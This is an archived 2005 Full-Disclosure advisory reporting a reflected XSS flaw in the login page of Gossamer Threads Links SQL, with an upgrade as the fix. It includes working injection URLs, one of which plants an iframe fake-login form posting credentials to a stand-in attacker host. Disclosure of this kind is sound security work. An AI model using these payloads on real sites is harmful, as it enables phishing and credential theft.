[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Gossamer Threads Links SQL login XSS Vulnerability

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Gossamer Threads Links SQL login XSS Vulnerability
From: "Nathan House" <nhouse@xxxxxxxxxxxx>
Date: Thu, 5 May 2005 20:17:37 -0000 (GMT)

Gossamer Threads Links SQL login XSS Vulnerability

Class
Input Validation XSS

Remote Local Published / Updated
Yes Yes 04th May 2005

Vulnerable
Vulnerable: Gossamer Threads Links SQL v3.0
+ Links SQL 2.x
+ Links SQL 2.2.x
+ Links SQL 3.0

Not Vulnerable
-

Discussion
Links SQL is a perl/mod_perl/PHP web application written by Gossamer Threads
and is used to build any type of directory. Although designed to manage
links, Links SQL is very customisable and is used all over the Internet for a
wide range of tasks such as Image Galleries, Press Releases,
Yellowpages, Company Directories, and other categorised databases.

The URL variable in the Gossamer Threads Links SQL login page (user.cgi) is a
hidden field in the login form and can be passed directly to user.cgi
in the form of user.cgi?url="xyz"
The URL variable is client side input created by the browser when a user clicks
on a link which requires authentication.
After authentication the user is redirected to the URL in the URL variable.
This URL variable does not sufficiently validate the client side input and is
therefore vulnerable to script injection and cross site scripting
(XSS) attacks.

Exploit
This is a standard XSS vulnerability.

Note an attacker would normally obfuscate the linking code but for these
examples I have made it simple for the sake of understanding.

Simple Example 1 (Pop up)
/user.cgi?url="><script>alert("XSS Vulnerability")</script><"&from=rate

Resulting in the following within the HTML being injected:
<input type="hidden" name="url" value=""><script>alert("XSS
Vulnerability")</script><"" />

Simple Example 2 (iframe to steal username and password)
/user.cgi?url="><iframe%20src="http://www.stationx.net/linksql.html"%20scrolling="No"%20align="MIDDLE"%20width="100%"%20height="3000"%20frameborder="No";></iframe><!--&from=rate

Example 2 produces an invisible iframe presenting a fake login screen to
collect usernames and passwords with the following HTML injected;
<form action="http://hacker.com/getusernameandpassword.cgi"; method="post">

The <script> content is limited by the imagination of the attacker and the
above are just two examples.

Like all XSS vulnerabilities this is a user attack only and not an attack on
the system (Links SQL). Although if the user happens to be the links
sql moderator/admin this user attack could be used to escalate privilege to
then attack links sql.

To exploit this XSS vulnerability the victim must be tricked into making the
above or other carefully crafted HTTP request. There are several ways
users can be tricked to do this but common methods include via a link in an
HTML aware email, a web based forum (Gossamer Threads forum) or embedded
in a malicious web page.

XSS attacks are often demonstrated harvesting cookies to perform session
hijacking and gather other sensitive information.

Solution
A new release has been created to fix this problem. Upgrade to Gossamer Links
3.0.1

http://www.gossamer-threads.com/forum/Gossamer_Links_3.0.1_Released_P280986/

http://gossamer-threads.com/perl/gforum/gforum.cgi?post=281029;

Credit
Nathan House @ StationX

References
http://www.stationx.net
http://www.stationx.net/advisories.php
http://www.gossamer-threads.com/scripts/links-sql/index.htm

Legal Notice
Copyright (©) 2005 StationX (UK) ltd. Referred to as ?StationX? further more.
This advisory written by StationX can be distributed freely electronically
without permission from StationX. This advisory may not be altered
without the express written permission of StationX. If you wish to print this
advisory whole or in part in any none electronic form please contact
StationX for consent.

Disclaimer
This advisory to the best of our knowledge and given current information is
correct and accurate at the date given above ?Published / Updated?. Use
of any information in this advisory is for informational purposes only to help
further the development of the security industry and help further
secure systems. The information in the advisory should NOT be used adversely.
StationX, the author and any publishers gives no guarantees or
warranties at all with regards to any information in this advisory. Under no
circumstances shall StationX, the author and any publishers be liable
in contract, tort, or otherwise, for any loss or damage whatsoever arising from
use of or in any way connected with this advisory or any hyperlinked
website, including, without limitation, damages for loss of business, loss of
profits, business interruption, loss of business information, loss of
programs or other data on the user's information handling system or otherwise
maintained, or any other pecuniary loss (even where StationX, the
author and any publishers has been advised of the possibility of such loss or
damage arising).

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] [ GLSA 200505-02 ] Oops!: Remote code execution
Next by Date: [Full-disclosure] Statcounter Script Injection User Session Hijack
Previous by thread: [Full-disclosure] [ GLSA 200505-02 ] Oops!: Remote code execution
Next by thread: [Full-disclosure] Statcounter Script Injection User Session Hijack
Index(es):
- Date
- Thread